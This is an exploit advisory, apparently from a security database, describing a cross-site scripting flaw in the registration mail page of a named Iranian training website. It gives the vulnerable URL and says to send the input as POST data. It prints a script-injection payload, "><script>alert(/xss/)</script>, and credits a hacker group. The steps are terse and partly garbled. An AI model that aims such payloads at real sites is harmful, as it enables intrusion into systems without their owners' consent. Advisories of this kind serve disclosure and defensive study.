Ashiyane Training Center Site Scripting

Published
Credit
Risk
2017.01.20
Hacker.khan
Low
CWE
CVE
Local
Remote
CWE-79
N/A
No
Yes

|=============================================================|
|[+] Exploit Title: Ashiyane Training Center Site Scripting
|[+]
|[+] Exploit Author: Hacker.khan
|[+]
|[+] Vendor Homepage: http://train.ashiyane.ir
|[+]
|[+] Tested on: Win7
|[+]
|[+] Date: 2017-01-17
|=============================================================|

|[+] The use of this vulnerability through which an attacker Hackbr plugin using scripts can be run on your site

|[+] Vulnerability Path : http://train.ashiyane.ir/register/mail.php

|[+] Put the code in the plug-hacking on the box

|[+] Enable post data

|[+] D1="><script>alert(/xss/)</script>

|[+] ID: Hacker.khan@xtra.co.nz

=================================================================

|[+] Thanks to : Iranian Anonymous

|[+] Exploit Author: Hacker.khan


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com